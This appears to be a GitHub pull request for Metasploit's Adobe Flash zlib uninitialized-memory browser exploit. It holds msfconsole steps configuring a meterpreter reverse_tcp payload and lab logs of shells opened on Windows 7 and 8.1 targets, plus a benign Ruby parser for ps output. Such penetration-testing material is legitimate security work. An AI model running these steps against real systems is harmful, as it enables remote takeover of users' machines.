
adobe_flash_uncompress_zlib_uninitialized: Execution from the flash renderer / Windows 8.1 #5519

Merged
merged 4 commits into from Jun 10, 2015


jvazquez-r7
Contributor

This PR modifies modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb to use the flash exploitation code, allowing native payload execution from the flash renderer process. So no more PowerShell: we execute meterpreter directly and we remain in the same flash renderer process.

It also adds support for:

  • Firefox (32 bits) / Adobe Flash plug-in on Windows 7 SP1.
  • Firefox (32 bits) / Adobe Flash plug-in on Windows 8.1

Verification

  • Install a Windows 7 target: Windows 7 SP1 32 bits / IE 11 / Firefox 38.0.5 / Adobe Flash 15.0.0.189 (ActiveX and plugin)
  • Install a Windows 8.1 target: Windows 8 SP1 (32 bits or 64 bits), Firefox 38.0.5 (32 bits) and Flash 15.0.0.189 (Plug-in)
  • Run msfconsole and use the module modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized
  • Run the module with the windows/meterpreter/reverse_tcp payload
msf > use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
  • Visit the page from Windows 7 SP1 / IE 11 / Adobe Flash 15.0.0.189 (ActiveX), verify that you get a session and that it lives inside the IE renderer process:
msf exploit(adobe_flash_uncompress_zlib_uninitialized) >
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Gathering target information.
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending HTML response.
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending HTML...
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/BgHb.swf
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.131:50522) at 2015-06-09 15:52:03 -0500

msf exploit(adobe_flash_uncompress_zlib_uninitialized) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 1124
meterpreter > ps -S 1124


Process list
============

 PID   Name                                Arch  Session  User                          Path
 ---   ----                                ----  -------  ----                          ----
 1124  iexplore.exe                        x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Program Files\Internet Explorer\iexplore.exe


meterpreter > exit
[*] Shutting down Meterpreter...
  • Visit the page from Windows 7 SP1 / Firefox / Adobe Flash 15.0.0.189 (plugin), verify that you get a session and that it lives inside the Flash renderer process:
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > [*] Using URL: http://172.16.158.1:8080/To2uueK
[*] Server started.
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Gathering target information.
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending HTML response.
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending HTML...
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/HpNv.swf
[*] 172.16.158.131   adobe_flash_uncompress_zlib_uninitialized - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:50513) at 2015-06-09 15:51:34 -0500

msf exploit(adobe_flash_uncompress_zlib_uninitialized) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 2064
meterpreter > ps -S 2064


Process list
============

 PID   Name                              Arch  Session  User                          Path
 ---   ----                              ----  -------  ----                          ----
 2064  FlashPlayerPlugin_15_0_0_189.exe  x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_15_0_0_189.exe


meterpreter > exit
[*] Shutting down Meterpreter...

  • Visit the page from Windows 8.1 / Firefox 38.0.5 / Adobe Flash 15.0.0.189 (Plugin), verify that you get a session and that it lives inside the Flash renderer process:
[*] 172.16.158.132   adobe_flash_uncompress_zlib_uninitialized - Sending HTML response.
[*] 172.16.158.132   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/
[*] 172.16.158.132   adobe_flash_uncompress_zlib_uninitialized - Sending HTML...
[*] 172.16.158.132   adobe_flash_uncompress_zlib_uninitialized - Request: /To2uueK/lChLGF/kNMqC.swf
[*] 172.16.158.132   adobe_flash_uncompress_zlib_uninitialized - Sending SWF...
[*] Sending stage (884270 bytes) to 172.16.158.132
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.132:51051) at 2015-06-09 15:59:07 -0500

msf exploit(adobe_flash_uncompress_zlib_uninitialized) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer        : WIN-U7MBH836GNO
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getpid
Current pid: 2644
meterpreter > ps -S 2644
Process list
============

 PID   Name                              Arch  Session  User                  Path
 ---   ----                              ----  -------  ----                  ----
 2644  FlashPlayerPlugin_15_0_0_189.exe  x86   1        WIN-U7MBH836GNO\juan  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_15_0_0_189.exe

meterpreter >
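As an added example (not part of this PR or of the Metasploit code base), a Ruby helper that performs the check the last three verification steps do by eye: it parses meterpreter's `getpid` and `ps -S <pid>` output and reports whether the session lives in the IE renderer (iexplore.exe) or the out-of-process Flash plugin host (FlashPlayerPlugin_*.exe). The sample rows are constructed from the transcripts above; any other process name is reported as unexpected.

```ruby
# Added example (not part of this PR or of Metasploit): parse the output of
# meterpreter's `getpid` / `ps -S <pid>` and report which process the session
# lives in. Sample outputs below are constructed from the transcripts in this PR.
PS_FLASH = <<~'PS'
   PID   Name                              Arch  Session  User                          Path
   ---   ----                              ----  -------  ----                          ----
   2064  FlashPlayerPlugin_15_0_0_189.exe  x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Windows\system32\Macromed\Flash\FlashPlayerPlugin_15_0_0_189.exe
PS
PS_IE = <<~'PS'
   PID   Name          Arch  Session  User                          Path
   ---   ----          ----  -------  ----                          ----
   1124  iexplore.exe  x86   1        WIN-RNJ7NBRK9L7\Juan Vazquez  C:\Program Files\Internet Explorer\iexplore.exe
PS

ProcessRow = Struct.new(:pid, :name, :arch, :session, :user, :path)
# One row of the `ps` table: PID, Name, Arch, Session, then User (which may hold
# a single space, e.g. "Juan Vazquez") and Path, separated by two or more spaces.
ROW_RE = /\A\s*(\d+)\s+(\S+)\s+(x86|x64)\s+(\d+)\s+(.+?)\s{2,}(\S.*?)\s*\z/

def parse_ps(output)
  output.each_line.map { |line| ROW_RE.match(line) }.compact.map do |m|
    ProcessRow.new(m[1].to_i, m[2], m[3], m[4].to_i, m[5], m[6])
  end
end

def parse_getpid(output)
  output[/Current pid:\s*(\d+)/, 1]&.to_i
end

# Processes the PR expects the session to land in: the IE renderer for the
# ActiveX target, the out-of-process plugin host for the Firefox targets.
RENDERERS = {
  /\Aiexplore\.exe\z/i                          => :ie_renderer,
  /\AFlashPlayerPlugin_\d+_\d+_\d+_\d+\.exe\z/i => :flash_plugin_renderer
}.freeze

def classify_session(pid, ps_output)
  row = parse_ps(ps_output).find { |r| r.pid == pid }
  return :no_such_pid unless row
  RENDERERS.each { |re, kind| return kind if re.match?(row.name) }
  :unexpected_process # e.g. a spawned powershell.exe, which the old module used
end

# "FlashPlayerPlugin_15_0_0_189.exe" -> "15.0.0.189", to compare against the
# Flash build the module was verified with.
def flash_version_from_name(name)
  m = name.match(/\AFlashPlayerPlugin_(\d+)_(\d+)_(\d+)_(\d+)\.exe\z/i)
  m && m.captures.join('.')
end
```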

@wchen-r7 wchen-r7 self-assigned this Jun 10, 2015
@wchen-r7 wchen-r7 merged commit e5d6c9a into rapid7:master Jun 10, 2015